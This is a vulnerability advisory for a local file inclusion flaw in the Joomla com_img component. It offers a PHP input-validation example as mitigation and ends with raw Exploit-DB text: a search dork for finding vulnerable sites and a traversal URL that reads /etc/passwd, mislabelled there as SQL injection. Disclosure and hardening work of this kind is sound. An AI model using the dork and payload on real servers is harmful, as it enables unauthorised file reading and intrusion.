Vendor: N/A
By: CoBRa_21
CVSS: 7.5 (HIGH)
Type: LFI
CWE: 22
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component (com_img) LFI Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable Joomla component (com_img) to read arbitrary files from the server. The vulnerable parameter is ‘controller’ which can be abused to traverse the directory structure and read any file on the server.

Mitigation:

Mitigate this vulnerability by validating and sanitizing user input, here the value of the ‘controller’ parameter, before the application uses it, so that directory traversal sequences never reach the file system.
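One way to implement that validation, as an added PHP example that is not com_img's or Joomla's own code: the function name `resolve_controller`, the temporary directory and the `gallery` controller are hypothetical, and the component is assumed to build a file path from the `controller` value.

```php
<?php
// Added example: resolve a request-supplied controller name to a file inside
// one fixed directory. Names and layout are assumptions, not com_img's code.

/**
 * Return the absolute path of the controller file for $name, or null if the
 * name is not acceptable. $baseDir is the component's controllers directory.
 */
function resolve_controller(string $name, string $baseDir): ?string
{
    // 1. Strict character allowlist: rejects "/", "\", ".", "%" and NUL bytes,
    //    so "../" sequences and "%00" truncation never reach the filesystem.
    if (!preg_match('/\A[a-z0-9_]{1,64}\z/i', $name)) {
        return null;
    }
    // 2. Canonicalise and confirm the result is still inside $baseDir
    //    (defence in depth, also catches symlinks pointing elsewhere).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null; // directory or controller file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the controllers directory
    }
    return $path;
}

// Constructed demo: a temporary controllers directory with one valid file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ctrl_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'gallery.php', "<?php\n");

$samples = [
    'gallery',                   // legitimate controller name
    "../../../../etc/passwd\0",  // shortened form of the advisory's value, URL-decoded
    'gallery.php',               // extension is appended by the code, not the caller
    'missing',                   // well-formed name with no matching file
];
foreach ($samples as $value) {
    $resolved = resolve_controller($value, $dir);
    printf("%-40s => %s\n", json_encode($value), $resolved === null ? 'rejected' : 'accepted');
}

unlink($dir . DIRECTORY_SEPARATOR . 'gallery.php');
rmdir($dir);
```

Only `gallery` is accepted; the caller includes the returned path and treats `null` as an unknown controller.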

Exploit-DB raw data:

################################################################################################################
Joomla Component (com_img) LFI  Vulnerability 
################################################################################################################
Author : CoBRa_21
Dork : inurl:com_img
################################################################################################################
Sql Injection :
http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00
################################################################################################################
Thanks Cyber-Warrior.org  &  AKINCILAR 
################################################################################################################